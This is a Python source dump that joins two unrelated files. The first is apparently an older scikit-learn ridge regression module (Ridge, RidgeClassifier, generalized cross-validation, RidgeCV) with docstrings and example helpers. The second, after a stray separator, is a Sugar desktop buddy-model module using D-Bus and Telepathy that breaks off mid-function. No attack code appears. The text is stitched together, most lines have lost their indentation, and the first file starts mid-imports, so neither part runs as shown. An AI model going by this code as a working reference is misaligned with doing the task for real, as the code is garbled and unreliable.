from ..grid_search import GridSearchCV
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto',
max_iter=None, tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix, LinearOperator},
shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational routines:
- 'auto' chooses the solver automatically based on the type of data.
- 'dense_cholesky' uses the standard scipy.linalg.solve function to
obtain a closed-form solution.
- 'sparse_cg' uses the conjugate gradient solver as found in
scipy.sparse.linalg.cg. As an iterative algorithm, this solver is
more appropriate than 'dense_cholesky' for large-scale data
(possibility to set `tol` and `max_iter`).
        - 'lsqr' uses the dedicated regularized least-squares routine
          scipy.sparse.linalg.lsqr. It is the fastest but may not be available
          in old scipy versions. It also uses an iterative procedure.
        All three solvers support both dense and sparse data.
    tol : float
        Precision of the solution.
    Returns
    -------
    coef : array, shape = [n_features] or [n_targets, n_features]
        Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
has_sw = isinstance(sample_weight, np.ndarray) or sample_weight != 1.0
if solver == 'auto':
# cholesky if it's a dense array and cg in
# any other case
if hasattr(X, '__array__'):
solver = 'dense_cholesky'
else:
solver = 'sparse_cg'
elif solver == 'lsqr' and not hasattr(sp_linalg, 'lsqr'):
        warnings.warn("lsqr not available on this machine, falling back "
                      "to sparse_cg.")
solver = 'sparse_cg'
if has_sw:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
        # conjugate gradient solver
X1 = sp_linalg.aslinearoperator(X)
if y.ndim == 1:
y1 = np.reshape(y, (-1, 1))
else:
y1 = y
coefs = np.empty((y1.shape[1], n_features))
if n_features > n_samples:
def mv(x):
return X1.matvec(X1.rmatvec(x)) + alpha * x
else:
def mv(x):
return X1.rmatvec(X1.matvec(x)) + alpha * x
for i in range(y1.shape[1]):
y_column = y1[:, i]
if n_features > n_samples:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
C = sp_linalg.LinearOperator(
(n_samples, n_samples), matvec=mv, dtype=X.dtype)
                coef, info = sp_linalg.cg(C, y_column, maxiter=max_iter,
                                          tol=tol)
coefs[i] = X1.rmatvec(coef)
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
y_column = X1.rmatvec(y_column)
C = sp_linalg.LinearOperator(
(n_features, n_features), matvec=mv, dtype=X.dtype)
coefs[i], info = sp_linalg.cg(C, y_column, maxiter=max_iter,
tol=tol)
if info != 0:
raise ValueError("Failed with error code %d" % info)
if y.ndim == 1:
coefs = np.ravel(coefs)
return coefs
elif solver == "lsqr":
if y.ndim == 1:
y1 = np.reshape(y, (-1, 1))
else:
y1 = y
coefs = np.empty((y1.shape[1], n_features))
# According to the lsqr documentation, alpha = damp^2.
sqrt_alpha = np.sqrt(alpha)
for i in range(y1.shape[1]):
y_column = y1[:, i]
coefs[i] = sp_linalg.lsqr(X, y_column, damp=sqrt_alpha,
atol=tol, btol=tol, iter_lim=max_iter)[0]
if y.ndim == 1:
coefs = np.ravel(coefs)
return coefs
else:
# normal equations (cholesky) method
if n_features > n_samples or has_sw:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
K = safe_sparse_dot(X, X.T, dense_output=True)
if has_sw:
# We are doing a little dance with the sample weights to
# avoid copying the original X, which could be big
sw = np.sqrt(sample_weight)
if y.ndim == 1:
y = y * sw
else:
# Deal with multiple-output problems
y = y * sw[:, np.newaxis]
K *= np.outer(sw, sw)
K.flat[::n_samples + 1] += alpha
dual_coef = linalg.solve(K, y,
sym_pos=True, overwrite_a=True)
if has_sw:
if dual_coef.ndim == 1:
dual_coef *= sw
else:
# Deal with multiple-output problems
dual_coef *= sw[:, np.newaxis]
coef = safe_sparse_dot(X.T, dual_coef, dense_output=True)
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = safe_sparse_dot(X.T, X, dense_output=True)
A.flat[::n_features + 1] += alpha
Xy = safe_sparse_dot(X.T, y, dense_output=True)
coef = linalg.solve(A, Xy, sym_pos=True, overwrite_a=True)
return coef.T
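# Illustrative sketch, not part of the original module: a numerical check of the
# primal/dual identity relied on above. The 'ridge' branch solves
# w = inv(X^T X + alpha*Id) X^T y, while the 'kernel ridge' branch solves
# w = X^T inv(X X^T + alpha*Id) y; both give the same weights. The helper name
# below is made up for this example and is never called by the library code.
def _check_primal_dual_equivalence(n_samples=5, n_features=20, alpha=2.0, seed=0):
    rng = np.random.RandomState(seed)
    X = rng.randn(n_samples, n_features)
    y = rng.randn(n_samples)
    # primal form: an (n_features x n_features) system
    w_primal = linalg.solve(X.T.dot(X) + alpha * np.eye(n_features), X.T.dot(y))
    # dual form: an (n_samples x n_samples) system, cheaper when n_features > n_samples
    w_dual = X.T.dot(linalg.solve(X.dot(X.T) + alpha * np.eye(n_samples), y))
    assert np.allclose(w_primal, w_dual)
    return w_primal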
class _BaseRidge(LinearModel):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, solver="auto"):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.max_iter = max_iter
self.tol = tol
self.solver = solver
def fit(self, X, y, sample_weight=1.0):
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = self._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
self.coef_ = ridge_regression(X, y,
alpha=self.alpha,
sample_weight=sample_weight,
max_iter=self.max_iter,
tol=self.tol,
solver=self.solver)
self._set_intercept(X_mean, y_mean, X_std)
return self
class Ridge(_BaseRidge, RegressorMixin):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_targets]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the problem
and reduce the variance of the estimates. Alpha corresponds to
``(2*C)^-1`` in other linear models such as LogisticRegression or
LinearSVC.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
normalize : boolean, optional
If True, the regressors X are normalized
solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational routines:
- 'auto' chooses the solver automatically based on the type of data.
- 'dense_cholesky' uses the standard scipy.linalg.solve function to
obtain a closed-form solution.
- 'sparse_cg' uses the conjugate gradient solver as found in
scipy.sparse.linalg.cg. As an iterative algorithm, this solver is
more appropriate than 'dense_cholesky' for large-scale data
(possibility to set `tol` and `max_iter`).
- 'lsqr' uses the dedicated regularized least-squares routine
scipy.sparse.linalg.lsqr. It is the fastest but may not be available
in old scipy versions. It also uses an iterative procedure.
All three solvers support both dense and sparse data.
tol : float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, max_iter=None,
normalize=False, solver='auto', tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, solver="auto"):
super(Ridge, self).__init__(alpha=alpha, fit_intercept=fit_intercept,
normalize=normalize, copy_X=copy_X,
max_iter=max_iter, tol=tol, solver=solver)
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
Returns
-------
self : returns an instance of self.
"""
return super(Ridge, self).fit(X, y, sample_weight=sample_weight)
class RidgeClassifier(LinearClassifierMixin, _BaseRidge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the problem
and reduce the variance of the estimates. Alpha corresponds to
``(2*C)^-1`` in other linear models such as LogisticRegression or
LinearSVC.
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set to false, no
intercept will be used in calculations (e.g. data is expected to be
already centered).
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
normalize : boolean, optional
If True, the regressors X are normalized
solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational
routines. 'dense_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the
conjugate gradient solver as found in
scipy.sparse.linalg.cg, while 'auto' will choose the most
appropriate depending on the matrix X. 'lsqr' uses
the dedicated regularized least-squares routine provided by scipy.
tol : float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, class_weight=None,
solver="auto"):
super(RidgeClassifier, self).__init__(
alpha=alpha, fit_intercept=fit_intercept, normalize=normalize,
copy_X=copy_X, max_iter=max_iter, tol=tol, solver=solver)
self.class_weight = class_weight
def fit(self, X, y):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
Returns
-------
self : returns an instance of self.
"""
if self.class_weight is None:
class_weight = {}
else:
class_weight = self.class_weight
sample_weight_classes = np.array([class_weight.get(k, 1.0) for k in y])
self._label_binarizer = LabelBinarizer(pos_label=1, neg_label=-1)
Y = self._label_binarizer.fit_transform(y)
super(RidgeClassifier, self).fit(X, Y,
sample_weight=sample_weight_classes)
return self
@property
def classes_(self):
return self._label_binarizer.classes_
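# Illustrative sketch, not part of the original module: RidgeClassifier relies on
# LabelBinarizer(pos_label=1, neg_label=-1) to turn a multi-class target into a
# {-1, +1} indicator matrix with one column per class, which Ridge then fits as a
# multi-output regression (i.e. one-vs-all). The helper name below is made up for
# this example.
def _example_one_vs_all_targets():
    y = np.array([0, 1, 2, 1])
    lb = LabelBinarizer(pos_label=1, neg_label=-1)
    Y = lb.fit_transform(y)
    # Y is:
    # [[ 1, -1, -1],
    #  [-1,  1, -1],
    #  [-1, -1,  1],
    #  [-1,  1, -1]]
    # and predictions pick the column with the largest decision value.
    return Y, lb.classes_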
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to invert for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
References
----------
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None,
copy_X=True, gcv_mode=None, store_cv_values=False):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
self.gcv_mode = gcv_mode
self.store_cv_values = store_cv_values
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
v, Q = linalg.eigh(K)
QT_y = np.dot(Q.T, y)
return v, Q, QT_y
def _decomp_diag(self, v_prime, Q):
# compute diagonal of the matrix: dot(Q, dot(diag(v_prime), Q^T))
return (v_prime * Q ** 2).sum(axis=-1)
def _diag_dot(self, D, B):
# compute dot(diag(D), B)
if len(B.shape) > 1:
# handle case where B is > 1-d
D = D[(slice(None), ) + (np.newaxis, ) * (len(B.shape) - 1)]
return D * B
def _errors(self, alpha, y, v, Q, QT_y):
# don't construct matrix G, instead compute action on y & diagonal
w = 1.0 / (v + alpha)
c = np.dot(Q, self._diag_dot(w, QT_y))
G_diag = self._decomp_diag(w, Q)
# handle case where y is 2-d
if len(y.shape) != 1:
G_diag = G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, alpha, y, v, Q, QT_y):
# don't construct matrix G, instead compute action on y & diagonal
w = 1.0 / (v + alpha)
c = np.dot(Q, self._diag_dot(w, QT_y))
G_diag = self._decomp_diag(w, Q)
# handle case where y is 2-d
if len(y.shape) != 1:
G_diag = G_diag[:, np.newaxis]
return y - (c / G_diag), c
def _pre_compute_svd(self, X, y):
if sparse.issparse(X) and hasattr(X, 'toarray'):
X = X.toarray()
U, s, _ = np.linalg.svd(X, full_matrices=0)
v = s ** 2
UT_y = np.dot(U.T, y)
return v, U, UT_y
def _errors_svd(self, alpha, y, v, U, UT_y):
w = ((v + alpha) ** -1) - (alpha ** -1)
c = np.dot(U, self._diag_dot(w, UT_y)) + (alpha ** -1) * y
G_diag = self._decomp_diag(w, U) + (alpha ** -1)
if len(y.shape) != 1:
# handle case where y is 2-d
G_diag = G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values_svd(self, alpha, y, v, U, UT_y):
w = ((v + alpha) ** -1) - (alpha ** -1)
c = np.dot(U, self._diag_dot(w, UT_y)) + (alpha ** -1) * y
G_diag = self._decomp_diag(w, U) + (alpha ** -1)
if len(y.shape) != 1:
# handle case when y is 2-d
G_diag = G_diag[:, np.newaxis]
return y - (c / G_diag), c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples, n_features = X.shape
X, y, X_mean, y_mean, X_std = LinearModel._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
gcv_mode = self.gcv_mode
with_sw = len(np.shape(sample_weight))
if gcv_mode is None or gcv_mode == 'auto':
if n_features > n_samples or with_sw:
gcv_mode = 'eigen'
else:
gcv_mode = 'svd'
elif gcv_mode == "svd" and with_sw:
# FIXME non-uniform sample weights not yet supported
warnings.warn("non-uniform sample weights unsupported for svd, "
"forcing usage of eigen")
gcv_mode = 'eigen'
if gcv_mode == 'eigen':
_pre_compute = self._pre_compute
_errors = self._errors
_values = self._values
elif gcv_mode == 'svd':
# assert n_samples >= n_features
_pre_compute = self._pre_compute_svd
_errors = self._errors_svd
_values = self._values_svd
else:
raise ValueError('bad gcv_mode "%s"' % gcv_mode)
v, Q, QT_y = _pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
cv_values = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = _errors(sample_weight * alpha, y, v, Q, QT_y)
else:
out, c = _values(sample_weight * alpha, y, v, Q, QT_y)
cv_values[:, i] = out.ravel()
C.append(c)
if error:
best = cv_values.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), cv_values[:, i])
for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.alpha_ = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
if self.store_cv_values:
if len(y.shape) == 1:
cv_values_shape = n_samples, len(self.alphas)
else:
cv_values_shape = n_samples, n_y, len(self.alphas)
self.cv_values_ = cv_values.reshape(cv_values_shape)
return self
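# Illustrative sketch, not part of the original module: brute-force check of the
# leave-one-out identity used by _RidgeGCV, looe = c / diag(G) with
# G = inv(K + alpha*Id) and c = G y (no intercept, single alpha). The helper name
# is made up for this example.
def _check_loo_errors(n_samples=8, n_features=3, alpha=0.7, seed=0):
    rng = np.random.RandomState(seed)
    X = rng.randn(n_samples, n_features)
    y = rng.randn(n_samples)
    G = linalg.inv(X.dot(X.T) + alpha * np.eye(n_samples))
    looe_fast = G.dot(y) / np.diag(G)
    # brute force: refit the (intercept-free) ridge without sample i, then predict it
    looe_slow = np.empty(n_samples)
    for i in range(n_samples):
        mask = np.arange(n_samples) != i
        w = linalg.solve(X[mask].T.dot(X[mask]) + alpha * np.eye(n_features),
                         X[mask].T.dot(y[mask]))
        looe_slow[i] = y[i] - X[i].dot(w)
    assert np.allclose(looe_fast, looe_slow)
    return looe_fast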
class _BaseRidgeCV(LinearModel):
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]),
fit_intercept=True, normalize=False, score_func=None,
loss_func=None, cv=None, gcv_mode=None,
store_cv_values=False):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
self.gcv_mode = gcv_mode
self.store_cv_values = store_cv_values
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
estimator = _RidgeGCV(self.alphas,
fit_intercept=self.fit_intercept,
normalize=self.normalize,
score_func=self.score_func,
loss_func=self.loss_func,
gcv_mode=self.gcv_mode,
store_cv_values=self.store_cv_values)
estimator.fit(X, y, sample_weight=sample_weight)
self.alpha_ = estimator.alpha_
if self.store_cv_values:
self.cv_values_ = estimator.cv_values_
else:
if self.store_cv_values:
raise ValueError("cv!=None and store_cv_values=True "
"are incompatible")
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.alpha_ = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
class RidgeCV(_BaseRidgeCV, RegressorMixin):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation.
Parameters
----------
alphas: numpy array of shape [n_alphas]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to ``(2*C)^-1`` in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
gcv_mode : {None, 'auto', 'svd', 'eigen'}, optional
Flag indicating which strategy to use when performing
Generalized Cross-Validation. Options are::
'auto' : use svd if n_samples > n_features, otherwise use eigen
'svd' : force computation via singular value decomposition of X
'eigen' : force computation via eigendecomposition of X X^T
The 'auto' mode is the default and is intended to pick the cheaper \
option of the two depending upon the shape of the training data.
store_cv_values : boolean, default=False
Flag indicating if the cross-validation values corresponding to
each alpha should be stored in the `cv_values_` attribute (see
below). This flag is only compatible with `cv=None` (i.e. using
Generalized Cross-Validation).
Attributes
----------
`cv_values_` : array, shape = [n_samples, n_alphas] or \
shape = [n_samples, n_targets, n_alphas], optional
Cross-validation values for each alpha (if `store_cv_values=True` and \
`cv=None`). After `fit()` has been called, this attribute will \
contain the mean squared errors (by default) or the values of the \
`{loss,score}_func` function (if provided in the constructor).
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
`alpha_` : float
Estimated regularization parameter.
See also
--------
Ridge: Ridge regression
RidgeClassifier: Ridge classifier
RidgeClassifierCV: Ridge classifier with built-in cross validation
"""
pass
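# Illustrative sketch, not part of the original module: minimal RidgeCV usage on
# the default GCV path (cv=None). With store_cv_values=True the per-sample
# leave-one-out squared errors for every candidate alpha are kept in cv_values_,
# and alpha_ is the candidate whose mean error was smallest. The data below are
# made up for this example.
def _example_ridge_cv(seed=0):
    rng = np.random.RandomState(seed)
    X = rng.randn(50, 5)
    y = X.dot(rng.randn(5)) + 0.1 * rng.randn(50)
    model = RidgeCV(alphas=[0.01, 0.1, 1.0, 10.0], store_cv_values=True).fit(X, y)
    # model.cv_values_ has shape (50, 4); model.alpha_ is one of the four candidates
    return model.alpha_, model.cv_values_.shape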
class RidgeClassifierCV(LinearClassifierMixin, _BaseRidgeCV):
"""Ridge classifier with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alphas]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Attributes
----------
`cv_values_` : array, shape = [n_samples, n_alphas] or \
shape = [n_samples, n_responses, n_alphas], optional
Cross-validation values for each alpha (if `store_cv_values=True` and
`cv=None`). After `fit()` has been called, this attribute will contain \
the mean squared errors (by default) or the values of the \
`{loss,score}_func` function (if provided in the constructor).
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
`alpha_` : float
Estimated regularization parameter
See also
--------
Ridge: Ridge regression
RidgeClassifier: Ridge classifier
RidgeCV: Ridge regression with built-in cross validation
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None,
class_weight=None):
super(RidgeClassifierCV, self).__init__(
alphas=alphas, fit_intercept=fit_intercept, normalize=normalize,
score_func=score_func, loss_func=loss_func, cv=cv)
self.class_weight = class_weight
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
class_weight : dict, optional
Present in the signature but ignored by this method; set
``class_weight`` on the constructor instead.
Returns
-------
self : object
Returns self.
"""
if self.class_weight is not None:
get_cw = self.class_weight.get
sample_weight = (sample_weight
* np.array([get_cw(k, 1.0) for k in y]))
self._label_binarizer = LabelBinarizer(pos_label=1, neg_label=-1)
Y = self._label_binarizer.fit_transform(y)
_BaseRidgeCV.fit(self, X, Y, sample_weight=sample_weight)
return self
@property
def classes_(self):
return self._label_binarizer.classes_
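# Illustrative sketch, not part of the original module: how the class_weight dict
# accepted by RidgeClassifierCV is expanded into per-sample weights inside fit()
# before the one-vs-all targets are built. The values are made up for this example.
def _example_class_weight_expansion():
    y = np.array([0, 0, 1, 2])
    class_weight = {1: 5.0}   # up-weight class 1; missing classes default to 1.0
    sample_weight = 1.0 * np.array([class_weight.get(k, 1.0) for k in y])
    # sample_weight is now array([1., 1., 5., 1.])
    return sample_weight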
|
|
# Copyright (C) 2006-2007 Red Hat, Inc.
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import logging
import dbus
from telepathy.client import Connection
from telepathy.interfaces import CONNECTION
from .xocolor import XoColor
import connection_watcher
from gi.repository import GObject
CONNECTION_INTERFACE_BUDDY_INFO = 'org.laptop.Telepathy.BuddyInfo'
_owner_instance = None
class BaseBuddyModel(GObject.GObject):
__gtype_name__ = 'SugarBaseBuddyModel'
def __init__(self, **kwargs):
self._key = None
self._nick = None
self._color = None
self._tags = None
self._current_activity = None
GObject.GObject.__init__(self, **kwargs)
def get_nick(self):
return self._nick
def set_nick(self, nick):
self._nick = nick
nick = GObject.property(type=object, getter=get_nick, setter=set_nick)
def get_key(self):
return self._key
def set_key(self, key):
self._key = key
key = GObject.property(type=object, getter=get_key, setter=set_key)
def get_color(self):
return self._color
def set_color(self, color):
self._color = color
color = GObject.property(type=object, getter=get_color, setter=set_color)
def get_tags(self):
return self._tags
tags = GObject.property(type=object, getter=get_tags)
def get_current_activity(self):
return self._current_activity
def set_current_activity(self, current_activity):
if self._current_activity != current_activity:
self._current_activity = current_activity
self.notify('current-activity')
current_activity = GObject.property(type=object,
getter=get_current_activity,
setter=set_current_activity)
def is_owner(self):
raise NotImplementedError
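# Illustrative sketch, not part of the original module: set_current_activity()
# above compares against the stored value before emitting the notification, so
# calling it repeatedly with the same activity produces a single
# 'notify::current-activity' emission. The helper name is made up; `buddy` is any
# BaseBuddyModel subclass instance, and the string stands in for a real activity
# object.
def _example_current_activity_notify(buddy):
    seen = []
    buddy.connect('notify::current-activity',
                  lambda obj, pspec: seen.append(obj.get_current_activity()))
    buddy.set_current_activity('activity-1')   # value changed -> notify emitted
    buddy.set_current_activity('activity-1')   # unchanged -> no emission
    return seen   # ['activity-1']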
class OwnerBuddyModel(BaseBuddyModel):
__gtype_name__ = 'SugarOwnerBuddyModel'
def __init__(self):
BaseBuddyModel.__init__(self)
self.props.nick = "rgs"
self.props.color = XoColor(None)
# self.props.key = get_profile().pubkey
self.props.key = "foobar"
self.connect('notify::nick', self.__property_changed_cb)
self.connect('notify::color', self.__property_changed_cb)
self.connect('notify::current-activity',
self.__current_activity_changed_cb)
bus = dbus.SessionBus()
bus.add_signal_receiver(
self.__name_owner_changed_cb,
signal_name='NameOwnerChanged',
dbus_interface='org.freedesktop.DBus')
bus_object = bus.get_object(dbus.BUS_DAEMON_NAME, dbus.BUS_DAEMON_PATH)
for service in bus_object.ListNames(
dbus_interface=dbus.BUS_DAEMON_IFACE):
if service.startswith(CONNECTION + '.'):
path = '/%s' % service.replace('.', '/')
Connection(service, path, bus,
ready_handler=self.__connection_ready_cb)
def __connection_ready_cb(self, connection):
self._sync_properties_on_connection(connection)
def __name_owner_changed_cb(self, name, old, new):
if name.startswith(CONNECTION + '.') and not old and new:
path = '/' + name.replace('.', '/')
Connection(name, path, ready_handler=self.__connection_ready_cb)
def __property_changed_cb(self, buddy, pspec):
self._sync_properties()
def __current_activity_changed_cb(self, buddy, pspec):
conn_watcher = connection_watcher.get_instance()
for connection in conn_watcher.get_connections():
if self.props.current_activity is not None:
activity_id = self.props.current_activity.activity_id
room_handle = self.props.current_activity.room_handle
else:
activity_id = ''
room_handle = 0
connection[CONNECTION_INTERFACE_BUDDY_INFO].SetCurrentActivity(
activity_id,
room_handle,
reply_handler=self.__set_current_activity_cb,
error_handler=self.__error_handler_cb)
def __set_current_activity_cb(self):
logging.debug('__set_current_activity_cb')
def _sync_properties(self):
conn_watcher = connection_watcher.get_instance()
for connection in conn_watcher.get_connections():
self._sync_properties_on_connection(connection)
def _sync_properties_on_connection(self, connection):
if CONNECTION_INTERFACE_BUDDY_INFO in connection:
